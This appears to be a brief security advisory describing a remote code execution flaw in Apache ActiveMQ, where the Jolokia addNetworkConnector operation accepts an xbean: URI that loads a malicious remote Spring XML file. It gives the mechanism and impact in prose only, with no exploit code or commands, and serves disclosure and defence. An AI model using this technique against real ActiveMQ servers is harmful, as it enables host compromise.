H3-2026-0008¶

Apache ActiveMQ Jolokia Remote Code Execution Vulnerability

Description¶

Apache ActiveMQ exposes a Jolokia JMX REST API through its web console. The addNetworkConnector broker operation accepts an arbitrary URI, including the xbean: protocol, which loads Spring XML bean definitions from a remote URL. This can be exploited to achieve remote code execution on the ActiveMQ host, by supplying a malicious Spring XML payload that instantiates Java classes to execute arbitrary commands.

Impact¶

An attacker with access to the ActiveMQ web console can achieve remote code execution as the ActiveMQ service user, leading to full compromise of the underlying host. This is especially dangerous when combined with unauthenticated Jolokia API access (CVE-2024-32114) or known default web console credentials.

References¶

• ActiveMQ Advisory for CVE-2026-34197
• Apache ActiveMQ Releases
• NVD: CVE-2026-34197
• NVD: CVE-2024-32114